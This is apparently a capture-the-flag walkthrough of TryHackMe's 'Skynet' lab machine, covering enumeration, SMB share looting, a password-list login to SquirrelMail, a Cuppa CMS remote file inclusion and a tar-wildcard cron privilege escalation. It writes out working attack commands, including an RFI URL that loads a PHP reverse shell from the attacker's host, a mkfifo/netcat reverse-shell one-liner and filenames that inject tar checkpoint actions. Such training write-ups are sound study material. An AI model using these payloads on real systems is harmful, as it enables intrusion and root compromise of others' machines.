Table of contents
Skynet is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path
Enumeration
Let’s start with the nmap
scan:
nmap -sC -sV -o nmap.txt <target_ip>
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
143/tcp open imap Dovecot imapd
As there is a port 80
open, let’s also run the gobuster
:
gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://<target_ip>
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================
We discovered /squirrelmail
directory, but it required authorization.
Let’s enumerate more! We still have services that we didn’t check yet. What about smb
?
smbmap -H <target_ip>
[+] Guest session IP: <target_ip>:445 Name: <target_ip>
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
It seems that only anonymous
is readable without authorization. It’s a good idea to check what is inside:
smbclient \\\\<target_ip>\\anonymous
smb: \> ls
. D 0 Wed Sep 18 00:41:20 2019
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
books D 0 Wed Sep 18 00:40:06 2019
9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Wed Sep 18 00:41:20 2019
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
The content of attention.txt
is:
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Only log1.txt
in the \logs
is worth looking, as it contains a list of possible passwords:
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
A short sum-up of the enumeration phase:
we have
milesdyson
as a potential usernamewe have the list of potential passwords
we have two places to try them out:
ssh
andsquirrel mail
It less likely that ssh
will be our way in, so let’s give squirrel mail
a try.
Try to find the correct password for user milesdyson
on http://<target_ip>/squirrelmail/src/login.php
.
I used Burp Suite
for that, Hydra
would also do the trick, but you can do it manually, it will not take long. wink
Alright, we are in! Let’s check the emails.
One of them is very interesting, others are useless.
The email with the subject Samba Password reset
will cough your eye immediately:
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
This email was sent from skynet@skynet
to the milesdyson
, so now we have the password from smb
share!
Login to the smb
with this password and look around.
You will find the file that pointing out that something interesting can be found at the /45kra24zxs28v3yd
.
We didn’t find that directory in the smb
, let’s check, maybe it’s on port 80
?
Navigate to the http://<target_ip>/45kra24zxs28v3yd/
and check what’s there.
Not so useful, huh?
Fire up your gobuster
one more time:
gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://<target_ip>/45kra24zxs28v3yd/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================
Yet another vector! The /administrator
directory leads us to the login form of the Cuppa CMS
. Unfortunately, the credentials that we already have will not work here.
Let’s look for other ways in.
We don’t know the version of the Cuppa CMS
, but it will not harm anyone if we will check for the available exploits.
\> Exploitation
searchsploit cuppa
Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt
We have only one RFI
. As we don’t have any other ideas, let’s try it out:
Grab a copy of php-reverse-shell.php
from PentestMonkey
, specify your IP and port.
Open nc
listener:
sudo nc -nlvp 1337
Open the web server in the folder with your reverse shell:
sudo python -m SimpleHTTPServer 80
Finally, let’s trigger the exploit itself:
http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php
Catch your shell!
You can upgrade your shell by
/usr/bin/script -qc /bin/bash /dev/null
\> PrivEsc
Transport your favorite tool for privilege escalations to the machine. As we already have SimpleHTTPServer
on port 80
you can use it.
cd
to the folder where you have access to writing (/tmp
for instance) and download the tool.
I will use Linux Smart Enumeration this time:
www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh
lse
has a great -l
flag, which allows you to specify how many details will be shown. I can recommend starting without it, and if you will not find anything useful, run lse.sh
again with -l 1
, -l 2
or -l 3
accordingly.
You will eventually spot the CRON
job is running on /home/milesdyson/backups/backup.sh
. Let’s investigate:
www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17 2019 /home/milesdyson/backups/backup.sh
www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So, we can’t edit the file, but what we can do, is the exploitation of the wildcard in the script.
You can read more about this vulnerability here.
Navigate to the /var/www/html
and do the following:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
Wait for a CRON
job to execute your shell.sh
.
Catch the root shell!
\> Takeaway
Enumeration can easily take half of the time of work on the machine.
“Connecting the dots” is a useful skill for penetration testing.
Take your time with the exploitation of the
CRON
jobs, can take a while to be executed.